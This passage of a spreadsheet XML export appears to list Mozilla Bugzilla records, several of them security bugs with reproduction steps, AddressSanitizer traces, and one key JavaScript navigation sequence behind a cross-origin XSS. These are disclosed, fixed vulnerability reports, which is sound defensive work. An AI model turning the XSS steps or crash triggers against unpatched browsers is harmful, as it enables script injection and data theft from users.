With any fix, please give credit for identifying the vulnerability to Samuel Groß of Google Project Zero.</t>
        </is>
      </c>
      <c r="X1170" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1171">
      <c r="A1171" t="n">
        <v>365952</v>
      </c>
      <c r="B1171" t="inlineStr">
        <is>
          <t>2007-01-04 12:12:29 -0800</t>
        </is>
      </c>
      <c r="C1171" t="inlineStr">
        <is>
          <t>Make VC8 SP1 the compiler for Win32 ref platform</t>
        </is>
      </c>
      <c r="D1171" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E1171" t="n">
        <v>1</v>
      </c>
      <c r="F1171" t="n">
        <v>1</v>
      </c>
      <c r="G1171" t="n">
        <v>5</v>
      </c>
      <c r="H1171" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1171" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J1171" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1171" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L1171" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1171" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1171" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1171" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1171" t="inlineStr"/>
      <c r="Q1171" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1171" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1171" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1171" t="n">
        <v>1</v>
      </c>
      <c r="U1171" t="n">
        <v>0</v>
      </c>
      <c r="V1171" t="n">
        <v>12</v>
      </c>
      <c r="W1171" t="inlineStr">
        <is>
          <t>bug 331404 is a NSS crasher that appears to be a bug in the Visual C++ 2005 CRT.  There's a fix on NSS trunk, but that doesn't help us on trunk builds of Firefox.  The bug appears to be fixed in VC8 SP1, see bug 331404 comment 58 and onward.  We should make SP1 the compiler for the Win32 ref platform to get this CRT bugfix among other things.</t>
        </is>
      </c>
      <c r="X1171" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1172">
      <c r="A1172" t="n">
        <v>1344461</v>
      </c>
      <c r="B1172" t="inlineStr">
        <is>
          <t>2017-03-04 01:57:33 -0800</t>
        </is>
      </c>
      <c r="C1172" t="inlineStr">
        <is>
          <t>Heap buffer overflow in nsDirIndexParser::ParseData</t>
        </is>
      </c>
      <c r="D1172" t="inlineStr">
        <is>
          <t>2024-05-30 09:29:59 -0700</t>
        </is>
      </c>
      <c r="E1172" t="n">
        <v>1</v>
      </c>
      <c r="F1172" t="n">
        <v>1</v>
      </c>
      <c r="G1172" t="n">
        <v>3</v>
      </c>
      <c r="H1172" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1172" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1172" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K1172" t="inlineStr">
        <is>
          <t>51 Branch</t>
        </is>
      </c>
      <c r="L1172" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1172" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1172" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1172" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1172" t="inlineStr">
        <is>
          <t>[adv-main53+][adv-esr52.1+][adv-esr45.9+]</t>
        </is>
      </c>
      <c r="Q1172" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1172" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1172" t="inlineStr">
        <is>
          <t>mozilla55</t>
        </is>
      </c>
      <c r="T1172" t="n">
        <v>1</v>
      </c>
      <c r="U1172" t="n">
        <v>0</v>
      </c>
      <c r="V1172" t="n">
        <v>32</v>
      </c>
      <c r="W1172" t="inlineStr">
        <is>
          <t>Created attachment 8843558
httpindex.php
User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Steps to reproduce:
1. Build Firefox with Address Sanitizer.
   I built with options and instructions  mentioned in "Manual Build" section in
   https://developer.mozilla.org/en-US/docs/Mozilla/Testing/Firefox_and_Address_Sanitizer
2. Download and host httpindex.php file on a web server.
    Web server should support PHP.
3. Start firefox.
4. Visit httpindex.php.
Actual results:
Firefox tab crashed.
Address Sanitizer Output
---------------------------
==4312==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6030002b7ac0 at pc 0x7fea5b5e3fc5 bp 0x7fff6d37d1b0 sp 0x7fff6d37d1a8
READ of size 1 at 0x6030002b7ac0 thread T0 (Web Content)
    #0 0x7fea5b5e3fc4 in nsDirIndexParser::ParseData(nsIDirIndex*, char*) firefox/netwerk/streamconv/converters/nsDirIndexParser.cpp:233 (discriminator 1)
    #1 0x7fea5b5e3fc4 in ?? ??:0
    #2 0x7fea5b5e27bf in nsDirIndexParser::ProcessData(nsIRequest*, nsISupports*) firefox/netwerk/streamconv/converters/nsDirIndexParser.cpp:407 (discriminator 1)
    #3 0x7fea5b5e27bf in ?? ??:0
    #4 0x7fea5b5e41a3 in nsDirIndexParser::OnDataAvailable(nsIRequest*, nsISupports*, nsIInputStream*, unsigned long, unsigned int) firefox/netwerk/streamconv/converters/nsDirIndexParser.cpp:350
    #5 0x7fea5b5e41a3 in ?? ??:0
    #6 0x7fea5b783b9b in mozilla::net::HttpChannelChild::DoOnDataAvailable(nsIRequest*, nsISupports*, nsIInputStream*, unsigned long, unsigned int) firefox/netwerk/protocol/http/HttpChannelChild.cpp:799 (discriminator 2)
    #7 0x7fea5b783b9b in ?? ??:0
    ...............................
0x6030002b7ac0 is located 0 bytes to the right of 32-byte region [0x6030002b7aa0,0x6030002b7ac0)
allocated by thread T0 (Web Content) here:
    #0 0x4d2628 in __interceptor_malloc _asan_rtl_
    #1 0x4d2628 in ?? ??:0
    #2 0x7fea5aedd939 in nsStringBuffer::Alloc(unsigned long) firefox/xpcom/string/nsSubstring.cpp:217
    #3 0x7fea5aedd939 in ?? ??:0
    #4 0x7fea5aedbdc4 in nsACString_internal::MutatePrep(unsigned int, char**, unsigned int*) firefox/xpcom/string/nsTSubstring.cpp:172
    #5 0x7fea5aedbdc4 in ?? ??:0
    #6 0x7fea5aed1170 in nsACString_internal::SetCapacity(unsigned int, mozilla::fallible_t const&amp;) firefox/xpcom/string/nsTSubstring.cpp:710
    #7 0x7fea5aed1170 in ?? ??:0
    #8 0x7fea5aed1501 in nsACString_internal::SetLength(unsigned int, mozilla::fallible_t const&amp;) firefox/xpcom/string/nsTSubstring.cpp:748
    #9 0x7fea5aed1501 in ?? ??:0
    #10 0x7fea5b5e40eb in nsDirIndexParser::OnDataAvailable(nsIRequest*, nsISupports*, nsIInputStream*, unsigned long, unsigned int) firefox/netwerk/streamconv/converters/nsDirIndexParser.cpp:336
    #11 0x7fea5b5e40eb in ?? ??:0
    #12 0x7fea5b783b9b in mozilla::net::HttpChannelChild::DoOnDataAvailable(nsIRequest*, nsISupports*, nsIInputStream*, unsigned long, unsigned int) firefox/netwerk/protocol/http/HttpChannelChild.cpp:799 (discriminator 2)
    #13 0x7fea5b783b9b in ?? ??:0
    ...............................
Expected results:
Firefox tab should not crash due to a Heap buffer overflow.</t>
        </is>
      </c>
      <c r="X1172" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1173">
      <c r="A1173" t="n">
        <v>803870</v>
      </c>
      <c r="B1173" t="inlineStr">
        <is>
          <t>2012-10-20 11:17:39 -0700</t>
        </is>
      </c>
      <c r="C1173" t="inlineStr">
        <is>
          <t>XSS using timed document navigations</t>
        </is>
      </c>
      <c r="D1173" t="inlineStr">
        <is>
          <t>2024-05-30 07:34:15 -0700</t>
        </is>
      </c>
      <c r="E1173" t="n">
        <v>1</v>
      </c>
      <c r="F1173" t="n">
        <v>1</v>
      </c>
      <c r="G1173" t="n">
        <v>3</v>
      </c>
      <c r="H1173" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1173" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1173" t="inlineStr">
        <is>
          <t>DOM: Navigation</t>
        </is>
      </c>
      <c r="K1173" t="inlineStr">
        <is>
          <t>16 Branch</t>
        </is>
      </c>
      <c r="L1173" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1173" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1173" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1173" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1173" t="inlineStr">
        <is>
          <t>[adv-main20+][adv-esr1705+]</t>
        </is>
      </c>
      <c r="Q1173" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1173" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1173" t="inlineStr">
        <is>
          <t>mozilla22</t>
        </is>
      </c>
      <c r="T1173" t="n">
        <v>1</v>
      </c>
      <c r="U1173" t="n">
        <v>0</v>
      </c>
      <c r="V1173" t="n">
        <v>61</v>
      </c>
      <c r="W1173" t="inlineStr">
        <is>
          <t>It is possible to load an arbitrary website with the document's baseURI pointing to a malicious server, which allows script injection or data theft when the page accesses a relative path.
The exploit performs several navigations to achieve a stable result. It seems to me that the crucial part is the following sequence:
opener.history.go(0);
opener.history.forward();
opener.location.hash='a';
In certain circumstances, the late hash navigation appears to confuse the browser to adopt the same BFCache and/or share a history entry between the 2 adjacent, cross-origin pages.</t>
        </is>
      </c>
      <c r="X1173" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1174">
      <c r="A1174" t="n">
        <v>637957</v>
      </c>
      <c r="B1174" t="inlineStr">
        <is>
          <t>2011-03-01 17:44:47 -0800</t>
        </is>
      </c>
      <c r="C1174" t="inlineStr">
        <is>
          <t>Make notifiers strong owners of mCallback, to prevent crashes due to unexpected events ordering</t>
        </is>
      </c>
      <c r="D1174" t="inlineStr">
        <is>
          <t>2024-08-20 12:28:43 -0700</t>
        </is>
      </c>
      <c r="E1174" t="n">
        <v>1</v>
      </c>
      <c r="F1174" t="n">
        <v>1</v>
      </c>
      <c r="G1174" t="n">
        <v>3</v>
      </c>
      <c r="H1174" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1174" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1174" t="inlineStr">
        <is>
          <t>SQLite and Embedded Database Bindings</t>
        </is>
      </c>
      <c r="K1174" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1174" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1174" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1174" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1174" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1174" t="inlineStr">
        <is>
          <t>[sg:moderate][hardblocker][tests in bug 638123][has patch]</t>
        </is>
      </c>
      <c r="Q1174" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1174" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1174" t="inlineStr">
        <is>
          <t>mozilla2.0</t>
        </is>
      </c>
      <c r="T1174" t="n">
        <v>1</v>
      </c>
      <c r="U1174" t="n">
        <v>0</v>
      </c>
      <c r="V1174" t="n">
        <v>31</v>
      </c>
      <c r="W1174" t="inlineStr">
        <is>
          <t>See https://bugzilla.mozilla.org/show_bug.cgi?id=634796#c22
While spinnging the events loop in a HandleResult is not nice at all, owenrship should be changed so that it won't make us crash at random addresses.</t>
        </is>
      </c>
      <c r="X1174" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1175">
      <c r="A1175" t="n">
        <v>1294095</v>
      </c>
      <c r="B1175" t="inlineStr">
        <is>
          <t>2016-08-10 08:38:56 -0700</t>
        </is>
      </c>
      <c r="C1175" t="inlineStr">
        <is>
          <t>Crash in mozilla::DataChannelConnection::SctpDtlsOutput</t>
        </is>
      </c>
      <c r="D1175" t="inlineStr">
        <is>
          <t>2017-02-09 07:56:05 -0800</t>
        </is>
      </c>
      <c r="E1175" t="n">
        <v>1</v>
      </c>
      <c r="F1175" t="n">
        <v>1</v>
      </c>
      <c r="G1175" t="n">
        <v>3</v>
      </c>
      <c r="H1175" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1175" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1175" t="inlineStr">
        <is>
          <t>WebRTC: Networking</t>
        </is>
      </c>
      <c r="K1175" t="inlineStr">
        <is>
          <t>49 Branch</t>
        </is>
      </c>
      <c r="L1175" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1175" t="inlineStr">
        <is>
          <t>Windows</t>
        </is>
      </c>
      <c r="N1175" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1175" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1175" t="inlineStr">
        <is>
          <t>[adv-main49+][adv-esr45.4+]</t>
        </is>
      </c>
      <c r="Q1175" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1175" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1175" t="inlineStr">
        <is>
          <t>mozilla51</t>
        </is>
      </c>
      <c r="T1175" t="n">
        <v>1</v>
      </c>
      <c r="U1175" t="n">
        <v>0</v>
      </c>
      <c r="V1175" t="n">
        <v>62</v>
      </c>
      <c r="W1175" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is 
report bp-c237a768-7c3a-4c28-b18c-ad34f2160810.
=============================================================
Crashing Thread (54)
Frame 	Module 	Signature 	Source
0 	xul.dll 	mozilla::DataChannelConnection::SctpDtlsOutput(void*, void*, unsigned int, unsigned char, unsigned char) 	netwerk/sctp/datachannel/DataChannel.cpp:691
1 	xul.dll 	sctp_lowlevel_chunk_output 	netwerk/sctp/src/netinet/sctp_output.c:5010
2 	mozglue.dll 	je_malloc 	memory/mozjemalloc/jemalloc.c:6184
3 	xul.dll 	sctp_abort_an_association 	netwerk/sctp/src/netinet/sctputil.c:4212
4 	xul.dll 	sctp_threshold_management 	netwerk/sctp/src/netinet/sctp_timer.c:167
5 	xul.dll 	sctp_t3rxt_timer 	netwerk/sctp/src/netinet/sctp_timer.c:832
6 	xul.dll 	sctp_timeout_handler 	netwerk/sctp/src/netinet/sctputil.c:1706
7 	xul.dll 	sctp_handle_tick 	netwerk/sctp/src/netinet/sctp_callout.c:155
8 	xul.dll 	user_sctp_timer_iterate 	netwerk/sctp/src/netinet/sctp_callout.c:194
9 	kernel32.dll 	BaseThreadInitThunk 	
10 	ntdll.dll 	__RtlUserThreadStart 	
11 	ntdll.dll 	_RtlUserThreadStart
crashes with this signature are regressing in number since the 49 nightly cycle &amp; the signature is currently making up 0.3% of browser crashes in 49.0b1.</t>
        </is>
      </c>
      <c r="X1175" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1176">
      <c r="A1176" t="n">
        <v>1324324</v>
      </c>
      <c r="B1176" t="inlineStr">
        <is>
          <t>2016-12-18 17:15:17 -0800</t>
        </is>
      </c>
      <c r="C1176" t="inlineStr">
        <is>
          <t>Windows 32bit build failed with "rustc.EXE --version --verbose` failed"</t>
        </is>
      </c>
      <c r="D1176" t="inlineStr">
        <is>
          <t>2018-03-02 12:12:20 -0800</t>
        </is>
      </c>
      <c r="E1176" t="n">
        <v>1</v>
      </c>
      <c r="F1176" t="n">
        <v>1</v>
      </c>
      <c r="G1176" t="n">
        <v>7</v>
      </c>
      <c r="H1176" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I1176" t="inlineStr">
        <is>
          <t>Firefox Build System</t>
        </is>
      </c>
      <c r="J1176" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1176" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1176" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1176" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1176" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1176" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1176" t="inlineStr"/>
      <c r="Q1176" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1176" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1176" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1176" t="n">
        <v>1</v>
      </c>
      <c r="U1176" t="n">
        <v>0</v>
      </c>
      <c r="V1176" t="n">
        <v>5</v>
      </c>
      <c r="W1176" t="inlineStr">
        <is>
          <t>I updated mozilla-central today, and now I can't build.
I ran `./mach bootstrap`, and then tried to build, and the build failed with:
 0:05.39 checking for rustc... c:/Users/cpearce/.cargo/bin/rustc.EXE
 0:05.39 checking for cargo... c:/Users/cpearce/.cargo/bin/cargo.EXE
 0:05.60 checking rustc version... 1.13.0
 0:05.80 checking cargo support for --frozen... yes
 0:06.01 DEBUG: Executing: `c:/Users/cpearce/.cargo/bin/rustc.EXE --crate-type staticlib --target=i686-pc-windows-msvc -o 'c:\users\cpearce\appdata\local\temp\conftestbkt5kd.rlib'
'c:\users\cpearce\appdata\local\temp\conftestvxevy0.rs'`
 0:06.01 DEBUG: The command returned non-zero exit status 101.
 0:06.01 DEBUG: Its error output was:
 0:06.01 DEBUG: | error[E0463]: can't find crate for `std`
 0:06.01 DEBUG: |
 0:06.01 DEBUG: | error: aborting due to previous error
 0:06.01 DEBUG: |
 0:06.01 ERROR: Cannot compile for i686-pc-mingw32 with c:/Users/cpearce/.cargo/bin/rustc.EXE
 0:06.01 The target may be unsupported, or you may not have
 0:06.01 a rust std library for that target installed. Try:
 0:06.01
 0:06.01   rustup target add i686-pc-windows-msvc
 0:06.01
 0:06.04 *** Fix above errors and then restart with\
 0:06.04                "c:/mozilla-build/mozmake/mozmake.EXE -f client.mk build"
 0:06.04 client.mk:375: recipe for target 'configure' failed
 0:06.04 mozmake.EXE: *** [configure] Error 1
Running `rustup target add i686-pc-windows-msvc` as suggested fixed that. It would be good if `./mach bootstrap` would do that for you.
Then the build failed with:
0:05.53 DEBUG: Executing: `c:/Users/cpearce/.cargo/bin/rustc.EXE --version --verbose`
0:05.53 DEBUG: The command returned non-zero exit status 1.
0:05.53 DEBUG: Its error output was:
0:05.53 DEBUG: | error: command failed: 'rustc.EXE'
0:05.53 DEBUG: | info: caused by: The system cannot find the file specified. (os error 2)
0:05.53 ERROR: Command `c:/Users/cpearce/.cargo/bin/rustc.EXE --version --verbose` failed with exit status 1.
0:05.56 *** Fix above errors and then restart with\
0:05.56                "c:/mozilla-build/mozmake/mozmake.EXE -f client.mk build"
0:05.56 client.mk:375: recipe for target 'configure' failed
0:05.56 mozmake.EXE: *** [configure] Error 1
On my system, I can execute rustc.exe, but not rustc.EXE.
So perhaps whatever is finding the path to rustc should append ".exe", and not ".exe"?
I'm doing a 32bit Windows build.
I've had to disable rust, as I otherwise can't build at the moment.</t>
        </is>
      </c>
      <c r="X1176" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1177">
      <c r="A1177" t="n">
        <v>804927</v>
      </c>
      <c r="B1177" t="inlineStr">
        <is>
          <t>2012-10-23 22:55:55 -0700</t>
        </is>
      </c>
      <c r="C1177" t="inlineStr">
        <is>
          <t>heap-buffer-overflow in gfxShapedWord::CompressedGlyph::IsClusterStart</t>
        </is>
      </c>
      <c r="D1177" t="inlineStr">
        <is>
          <t>2024-05-30 07:34:21 -0700</t>
        </is>
      </c>
      <c r="E1177" t="n">
        <v>1</v>
      </c>
      <c r="F1177" t="n">
        <v>1</v>
      </c>
      <c r="G1177" t="n">
        <v>3</v>
      </c>
      <c r="H1177" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1177" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1177" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K1177" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1177" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1177" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1177" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1177" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1177" t="inlineStr">
        <is>
          <t>[asan][adv-track-main17+][adv-track-esr17+]</t>
        </is>
      </c>
      <c r="Q1177" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1177" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1177" t="inlineStr">
        <is>
          <t>mozilla19</t>
        </is>
      </c>
      <c r="T1177" t="n">
        <v>1</v>
      </c>
      <c r="U1177" t="n">
        <v>0</v>
      </c>
      <c r="V1177" t="n">
        <v>59</v>
      </c>
      <c r="W1177" t="inlineStr">
        <is>
          <t>Created attachment 674555
Testcase
Reproduces on trunk.
=================================================================
==18316== ERROR: AddressSanitizer heap-buffer-overflow on address 0x7f564317a4c8 at pc 0x7f56663d9456 bp 0x7fff810a54f0 sp 0x7fff810a54e8
READ of size 4 at 0x7f564317a4c8 thread T0
    #0 0x7f56663d9455 in gfxShapedWord::CompressedGlyph::IsClusterStart() const ../../dist/include/gfxFont.h:1920
    #1 0x7f56663225e9 in gfxTextRun::IsClusterStart(unsigned int) ../../dist/include/gfxFont.h:2383
    #2 0x7f5666377101 in CountCharsFit(gfxTextRun*, unsigned int, unsigned int, double, PropertyProvider*, double*) layout/generic/nsTextFrameThebes.cpp:6128
    #3 0x7f5666375ac4 in nsTextFrame::GetCharacterOffsetAtFramePointInternal(nsPoint const&amp;, bool) layout/generic/nsTextFrameThebes.cpp:6171
    #4 0x7f5666375047 in nsTextFrame::CalcContentOffsetsFromFramePoint(nsPoint) layout/generic/nsTextFrameThebes.cpp:6144
    #5 0x7f5665f6051d in nsIFrame::GetContentOffsetsFromPoint(nsPoint, unsigned int) layout/generic/nsFrame.cpp:3643
    #6 0x7f5665f5cde3 in nsFrame::HandlePress(nsPresContext*, nsGUIEvent*, nsEventStatus*) layout/generic/nsFrame.cpp:2714
    #7 0x7f5665f56c27 in nsFrame::HandleEvent(nsPresContext*, nsGUIEvent*, nsEventStatus*) layout/generic/nsFrame.cpp:2401
    #8 0x7f5665c259ae in nsPresShellEventCB::HandleEvent(nsEventChainPostVisitor&amp;) layout/base/nsPresShell.cpp:492
    #9 0x7f5668432cc3 in nsEventTargetChainItem::HandleEventTargetChain(nsEventChainPostVisitor&amp;, unsigned int, nsDispatchingCallback*, bool, nsCxPusher*) content/events/src/nsEventDispatcher.cpp:362
    #10 0x7f5668437f82 in nsEventDispatcher::Dispatch(nsISupports*, nsPresContext*, nsEvent*, nsIDOMEvent*, nsEventStatus*, nsDispatchingCallback*, nsCOMArray&lt;nsIDOMEventTarget&gt;*) content/events/src/nsEventDispatcher.cpp:629
    #11 0x7f5665be315f in PresShell::HandleEventInternal(nsEvent*, nsEventStatus*) layout/base/nsPresShell.cpp:6474
    #12 0x7f5665bdce63 in PresShell::HandlePositionedEvent(nsIFrame*, nsGUIEvent*, nsEventStatus*) layout/base/nsPresShell.cpp:6223
    #13 0x7f5665bd4dbf in PresShell::HandleEvent(nsIFrame*, nsGUIEvent*, bool, nsEventStatus*) layout/base/nsPresShell.cpp:6022
    #14 0x7f56699dc0f9 in nsViewManager::DispatchEvent(nsGUIEvent*, nsIView*, nsEventStatus*) view/src/nsViewManager.cpp:771
    #15 0x7f56699c7817 in nsView::HandleEvent(nsGUIEvent*, bool) view/src/nsView.cpp:1068
    #16 0x7f56699c7be1 in non-virtual thunk to nsView::HandleEvent(nsGUIEvent*, bool) :?
    #17 0x7f566f348c7a in nsWindow::DispatchEvent(nsGUIEvent*, nsEventStatus&amp;) widget/gtk2/nsWindow.cpp:458
    #18 0x7f566f37c3b1 in nsWindow::OnButtonPressEvent(_GtkWidget*, _GdkEventButton*) widget/gtk2/nsWindow.cpp:2729
    #19 0x7f566f393349 in button_press_event_cb(_GtkWidget*, _GdkEventButton*) widget/gtk2/nsWindow.cpp:5256
    #20 0x7f566020cdd7 in ?? ??:0
0x7f564317a4c8 is located 0 bytes to the right of 136-byte region [0x7f564317a440,0x7f564317a4c8)
allocated by thread T0 here:
    #0 0x4c3e10 in malloc ??:?
    #1 0x7f5680d4b866 in moz_malloc memory/mozalloc/mozalloc.cpp:64
    #2 0x7f56721dffbb in gfxTextRun::AllocateStorageForTextRun(unsigned long, unsigned int) gfx/thebes/gfxFont.cpp:4469
    #3 0x7f56721c30dd in gfxTextRun::Create(gfxTextRunFactory::Parameters const*, unsigned int, gfxFontGroup*, unsigned int) gfx/thebes/gfxFont.cpp:4486
    #4 0x7f56721c69f9 in gfxFontGroup::MakeTextRun(unsigned char const*, unsigned int, gfxTextRunFactory::Parameters const*, unsigned int) gfx/thebes/gfxFont.cpp:3531
    #5 0x7f5666308b9e in gfxTextRun* MakeTextRun&lt;unsigned char&gt;(unsigned char const*, unsigned int, gfxFontGroup*, gfxTextRunFactory::Parameters const*, unsigned int) layout/generic/nsTextFrameThebes.cpp:552
    #6 0x7f56662fd9fb in BuildTextRunsScanner::BuildTextRunForFrames(void*) layout/generic/nsTextFrameThebes.cpp:2049
    #7 0x7f56662f2977 in BuildTextRunsScanner::FlushFrames(bool, bool) layout/generic/nsTextFrameThebes.cpp:1408
    #8 0x7f5666316a21 in BuildTextRuns(gfxContext*, nsTextFrame*, nsIFrame*, nsLineList_iterator const*, nsTextFrame::TextRunType) layout/generic/nsTextFrameThebes.cpp:1336
Shadow byte and word:
  0x1feac862f499: fb
  0x1feac862f498: 00 fb fb fb fb fb fb fb
More shadow bytes:
  0x1feac862f478: fd fd fd fd fd fd fd fd
  0x1feac862f480: fa fa fa fa fa fa fa fa
  0x1feac862f488: 00 00 00 00 00 00 00 00
  0x1feac862f490: 00 00 00 00 00 00 00 00
=&gt;0x1feac862f498: 00 fb fb fb fb fb fb fb
  0x1feac862f4a0: fa fa fa fa fa fa fa fa
  0x1feac862f4a8: fd fd fd fd fd fd fd fd
  0x1feac862f4b0: fd fd fd fd fd fd fd fd
  0x1feac862f4b8: fd fd fd fd fd fd fd fd
Stats: 268M malloced (261M for red zones) by 537106 calls
Stats: 44M realloced by 25642 calls
Stats: 237M freed by 307654 calls
Stats: 204M really freed by 253059 calls
Stats: 265M (67958 full pages) mmaped in 507 calls
  mmaps   by size class: 7:221130; 8:47081; 9:13299; 10:6643; 11:7650; 12:1664; 13:896; 14:544; 15:144; 16:680; 17:452; 18:134; 19:35; 20:21;
  mallocs by size class: 7:380809; 8:92863; 9:25780; 10:10928; 11:16758; 12:3095; 13:1929; 14:1723; 15:343; 16:1260; 17:1370; 18:183; 19:42; 20:23;
  frees   by size class: 7:193336; 8:64604; 9:19790; 10:7821; 11:13658; 12:2141; 13:1717; 14:1555; 15:289; 16:1173; 17:1353; 18:158; 19:39; 20:20;
  rfrees  by size class: 7:163685; 8:49891; 9:15630; 10:4663; 11:12235; 12:1530; 13:1333; 14:1345; 15:244; 16:1098; 17:1289; 18:61; 19:37; 20:18;
Stats: malloc large: 3221 small slow: 5781
==18316== ABORTING</t>
        </is>
      </c>
      <c r="X1177" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1178">
      <c r="A1178" t="n">
        <v>911547</v>
      </c>
      <c r="B1178" t="inlineStr">
        <is>
          <t>2013-09-01 03:03:09 -0700</t>
        </is>
      </c>
      <c r="C1178" t="inlineStr">
        <is>
          <t>data-URI + Firefox restart = CSP bypass</t>
        </is>
      </c>
      <c r="D1178" t="inlineStr">
        <is>
          <t>2015-02-25 21:53:31 -0800</t>
        </is>
      </c>
      <c r="E1178" t="n">
        <v>1</v>
      </c>
      <c r="F1178" t="n">
        <v>1</v>
      </c>
      <c r="G1178" t="n">
        <v>3</v>
      </c>
      <c r="H1178" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1178" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1178" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K1178" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1178" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1178" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1178" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1178" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1178" t="inlineStr">
        <is>
          <t>[adv-main28+]</t>
        </is>
      </c>
